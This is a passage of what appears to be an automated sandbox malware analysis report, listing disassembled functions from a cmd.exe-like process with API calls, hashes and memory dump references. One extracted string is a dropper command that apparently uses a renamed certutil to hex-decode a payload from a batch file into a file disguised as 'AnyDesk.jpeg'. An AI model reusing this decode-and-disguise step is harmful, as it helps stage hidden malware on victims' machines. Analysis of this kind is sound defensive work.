                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MemoryProcessRead$AddressLibraryLoadProc
                                                                                                  • String ID: NTDLL.DLL$NtQueryInformationProcess
                                                                                                  • API String ID: 1580871199-2613899276
                                                                                                  • Opcode ID: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                                                                                  • Instruction ID: 224d1ac0d4012eea79a6ecfb479d1b986fac0732fd3a3667147746ecfa9d14f7
                                                                                                  • Opcode Fuzzy Hash: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                                                                                  • Instruction Fuzzy Hash: 3051C472B18B8286EB50AB16F810279B7E4FB88B86FA45135DE8E03B54DF7CD441C720
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
                                                                                                  • String ID: con
                                                                                                  • API String ID: 689241570-4257191772
                                                                                                  • Opcode ID: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
                                                                                                  • Instruction ID: a68fd098ef20baad27440bf176e1c5d07678abea5647b6b944b6dafcb1733a5c
                                                                                                  • Opcode Fuzzy Hash: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
                                                                                                  • Instruction Fuzzy Hash: AD41C432A0864586E350AF15A45437DFEA1F789BA6FA48338DA2D437D0CFBDD849C760
                                                                                                  APIs
                                                                                                  • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF7823F849D,?,?,?,00007FF7823FF0C7), ref: 00007FF7823E0045
                                                                                                  • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7823FF0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7823FE964), ref: 00007FF7823E0071
                                                                                                  • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823E0092
                                                                                                  • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7823E00A7
                                                                                                  • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823E0148
                                                                                                  • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7823E0181
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$LockPointerShared$AcquireByteCharMultiReadReleaseWide
                                                                                                  • String ID:
                                                                                                  • API String ID: 734197835-0
                                                                                                  • Opcode ID: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
                                                                                                  • Instruction ID: 54a6fea25f0554cbc1e8db076c6d93870db0689d90459f37e9cefedb014b2075
                                                                                                  • Opcode Fuzzy Hash: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
                                                                                                  • Instruction Fuzzy Hash: 7D61B539A0C69296E720AB11E810339FAE1FB45B46FE48179DD4D17F90DFBCA849C720
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$EnvironmentVariable
                                                                                                  • String ID: DIRCMD
                                                                                                  • API String ID: 1405722092-1465291664
                                                                                                  • Opcode ID: ffb8ac6f460930c1464a251cfe4f6a37909ed3687fd59a2300d1627ea223b7d7
                                                                                                  • Instruction ID: 7e02b81fbccff886aae52d0871d9d094b24f4f676bc82bffae2e9075cf9bc5cf
                                                                                                  • Opcode Fuzzy Hash: ffb8ac6f460930c1464a251cfe4f6a37909ed3687fd59a2300d1627ea223b7d7
                                                                                                  • Instruction Fuzzy Hash: 1B819F72A08BC28AEB20DF20E8942EDB7A4FB48349F604179DA8D67F59DF78D145C710
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File_get_osfhandle$Pointer$BuffersFlushRead
                                                                                                  • String ID:
                                                                                                  • API String ID: 3192234081-0
                                                                                                  • Opcode ID: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                                                                                  • Instruction ID: 3f69d666e889f2eea9266a7a16e635a59012bb12573fbd58c628e578d99e88f1
                                                                                                  • Opcode Fuzzy Hash: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                                                                                  • Instruction Fuzzy Hash: 3231A032A086418BE750AF22B41867DFFA0FB89B82F909538DE4A43B95CE7CD445CB10
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Error$CurrentDirectoryModememset$EnvironmentLastVariable
                                                                                                  • String ID:
                                                                                                  • API String ID: 920682188-0
                                                                                                  • Opcode ID: 9d1635e35e3ac97de0e6528cece6faaa031c08ed2930d9ed60b369340f3def9a
                                                                                                  • Instruction ID: 11a0c52085214138767965d33ade0165a1f6357f4a5a1d48b5db00d3ef3865c2
                                                                                                  • Opcode Fuzzy Hash: 9d1635e35e3ac97de0e6528cece6faaa031c08ed2930d9ed60b369340f3def9a
                                                                                                  • Instruction Fuzzy Hash: C5519E36705BC18AEB25EF21E8542E8B7A0FB88B45F948079CA4D47B54EF7CD545C720
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\saw.bat" "C:\\Users\\Public\\AnyDesk.jpeg" 9 , xrefs: 00007FF7823DE00B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Heap$FreeProcess_setjmp
                                                                                                  • String ID: C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\saw.bat" "C:\\Users\\Public\\AnyDesk.jpeg" 9
                                                                                                  • API String ID: 777023205-1105753690
                                                                                                  • Opcode ID: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                                                                                  • Instruction ID: 2a4768cdfede8242a8afe36b571afeccb25f500a55c4a3be4951ff18a7757101
                                                                                                  • Opcode Fuzzy Hash: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                                                                                  • Instruction Fuzzy Hash: 48515A71E1DA4285FA50AB12A8541B8FBA0FF48792FF44479D94D43BA5DFBCA840C731
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memsetwcsspn
                                                                                                  • String ID:
                                                                                                  • API String ID: 3809306610-0
                                                                                                  • Opcode ID: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
                                                                                                  • Instruction ID: 51549d999f0816f26f5b8644d7aacf9e9fa5ff55f8bde161b7bfcbec848e1eef
                                                                                                  • Opcode Fuzzy Hash: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
                                                                                                  • Instruction Fuzzy Hash: B1B1C576A08B4691EA50EF15E4602B9F7A0FB44B81FE4807ACA4D57F94DFBCE845C720
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: wcschr$iswdigit$wcstol
                                                                                                  • String ID:
                                                                                                  • API String ID: 3841054028-0
                                                                                                  • Opcode ID: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                                                                                  • Instruction ID: 0fba01d4cb4b86c207badb31a2165b7589d8cf0c13993b583ccf1a37fe3315b5
                                                                                                  • Opcode Fuzzy Hash: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                                                                                  • Instruction Fuzzy Hash: D2512C27A0475281EF68AB15E4205B9F6A1FF68752BE48136EE5D43AD4DF7CE881C320
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memsetwcsrchr$wcschr
                                                                                                  • String ID:
                                                                                                  • API String ID: 110935159-0
                                                                                                  • Opcode ID: b345b7c45728a808ede4069a13096384997743dec9cf79993fccb4cd8bca3deb
                                                                                                  • Instruction ID: 63cabbaa24b5dcfe913404cb6f63aa5b451414a2c12400408291b83b5db81955
                                                                                                  • Opcode Fuzzy Hash: b345b7c45728a808ede4069a13096384997743dec9cf79993fccb4cd8bca3deb
                                                                                                  • Instruction Fuzzy Hash: 40514A22B0978281FE60AB11A8243F9D390BF48BA6FA44175CE5D07FC4DE7CE545C310
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$File_get_osfhandle$PointerReadlongjmp
                                                                                                  • String ID:
                                                                                                  • API String ID: 1532185241-0
                                                                                                  • Opcode ID: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                                                                                  • Instruction ID: 15f93165345f2057b5e0316b1d5cdcbfadc1deb326caa66e62d42598615cc22a
                                                                                                  • Opcode Fuzzy Hash: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                                                                                  • Instruction Fuzzy Hash: E5410932A0475187EB50AB21E45567DFAA1FB88B42FE4457DEA0E43B84CF7CE841C720
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorFileLast$DeleteRead_get_osfhandle
                                                                                                  • String ID:
                                                                                                  • API String ID: 3588551418-0
                                                                                                  • Opcode ID: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                                                                                  • Instruction ID: b1ee25a9338f18783f50b039859f80a50fb4820fc0a03fc3825f6cb592a6ecac
                                                                                                  • Opcode Fuzzy Hash: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                                                                                  • Instruction Fuzzy Hash: 5B416072A08242CBEB646B51A46437DF651FB84B82FB4407DDA4E47B91CEBCE880C760
                                                                                                  APIs
                                                                                                  • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7823F9A82), ref: 00007FF7823FA77A
                                                                                                  • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7823F9A82), ref: 00007FF7823FA7AF
                                                                                                  • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7823F9A82), ref: 00007FF7823FA80E
                                                                                                  • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7823F9A82), ref: 00007FF7823FA839
                                                                                                  • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7823F9A82), ref: 00007FF7823FA850
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: QueryValue$CloseErrorLastOpen
                                                                                                  • String ID:
                                                                                                  • API String ID: 2240656346-0
                                                                                                  • Opcode ID: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                                                                                                  • Instruction ID: 6007433119481bc74f1af8be278ea00ea0372bcb4db6f39126c5aadd15c12b26
                                                                                                  • Opcode Fuzzy Hash: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                                                                                                  • Instruction Fuzzy Hash: 69319232A18B4186EB50AF15F460479FBA4FF88791FA44078EA4E43B64DF7CD845CB20
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateSemaphore
                                                                                                  • String ID: _p0$wil
                                                                                                  • API String ID: 1078844751-1814513734
                                                                                                  • Opcode ID: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                                                                                  • Instruction ID: 807a6166325d229a64678048fc2fb4d0acbe51463ae9e2531c857805f3190301
                                                                                                  • Opcode Fuzzy Hash: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                                                                                  • Instruction Fuzzy Hash: B151E462B1974283EE65AF14A0646B9A2A0FF84B92FF44479DA0D07F81DEBCE405C320
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$DiskFreeSpace
                                                                                                  • String ID: %5lu
                                                                                                  • API String ID: 2448137811-2100233843
                                                                                                  • Opcode ID: a32004ad0b0cd9a1642accdea686924f5f32727604a55ba99b3828265f09f6cb
                                                                                                  • Instruction ID: 0afc16e2bfb4d411225d278d638f57aff3b26d6d70b1309a27d0be1a8d754725
                                                                                                  • Opcode Fuzzy Hash: a32004ad0b0cd9a1642accdea686924f5f32727604a55ba99b3828265f09f6cb
                                                                                                  • Instruction Fuzzy Hash: B141C436708AC195EB61EF11E8546EAB760FB84789F908035EE4D0BB98DFBCD549C710
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
